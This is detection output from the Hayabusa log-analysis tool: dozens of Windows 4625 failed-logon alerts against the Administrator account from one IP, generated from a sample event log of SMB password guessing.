2016-09-20 01:51:53.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yQqfSKOyKLSILPrQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: k7oAI2q6YCu8btlK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KniVwndqE9aC6cIM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FgQbvpfuS11matJi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.702 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: R9TwJS4B9ZaDD2Ze  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IPUuoopOnwlTjlTP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9VEyOUuiOi8Q3JBJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pGGGazMTBBfrppDZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NKO4V35Y2qPEB59W  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WxVdhpR7ZnAluurU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gZjAZb9bQKZjwL8u  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.066 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aKyLX5ChpgBuFEbr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 49t2xJvH2yHcyHle  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sg9Z6Pyix2UkMolr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0NN2olYn97ZoYCja  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: S98j54bDGsz0k6g9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XxFEw9s0nnEQGzUN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wSswFHFSlqcQd47k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7icutlVIWSLZJszQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DSwyugYn0n3i5f25  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RmBaLCUcR7TmixTy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1oOBz2NQSCdTwa7V  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: O4tU1LPF5DRW9Vm0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.633 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SRsSNqPYruWBzp2n  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3JZhBLzt4af1VtCU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dFLZIKSDBvBaWq59  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: guAG4ZTFMjZAxp1A  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Yd04xsSIdiczICeG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.865 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Cx3i1URKPhC6KWI7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Npc6IS27HsWP3JA9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KIBnr0eZ1bHHGokW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6gTTrUVjpPU80LlC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FZlmUbCNAJga24JH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Zf3aSGBMe97VujaH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8bx7ZM77aDG7y6Lh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BnHHAClMwyqA3TTI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 00ibRrYvnFt5w9X0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VglTKbnLVFvHZHzQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.358 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3NwX0sDFwHQG7Tkq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3mMx3M1zurKMBzyj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sH7b8P0O0uea3PlN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TJcrTyBPuX0TcvOT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kwuZIQAL3BmJnPsJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lxgAfsnH6YWLRD0a  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ttBOjzmEBjr9W2QW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FPDKGGYkJQeWgtUf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nSoJWqS6YPbpCiBf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Pr2oMzxv7pcDfsgw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jiopmZAMpwg3dEaA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tG1Bxm0lt3vwoO5V  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.043 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9Kf5AaQX7KOVAIAN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FW9nBirBTHIXIrfp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: S9qKcDhfcf2kMk00  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9NgStzf2xQ4P7q0d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j9mCrjQykX06IcMf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7S0QccvEhetekdDP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n1OnibuatFHwDeLz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: O8u26bKzFOw12m0T  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WEEtOj6BOkI7MPY1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EiCpuqll36DojD3e  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: p9zjo9ZsSVLZcrsr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KKDD0O5flEsIEDRZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jdPMREVdBEJ50ELC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.626 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: p7YwRYYCnsr2v08C  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nWyAzzpmxUm2CXE9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9RNqhxyUBjUIic0n  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1JERyz3mOBZt2jki  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V0i93RW5AOsIKKMU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: U3XEu06vE68O900O  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0fxeGE2jXOnoJttj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6Wdg3l6IFHTdh09j  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4XLVQRnkUd3bfgvF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
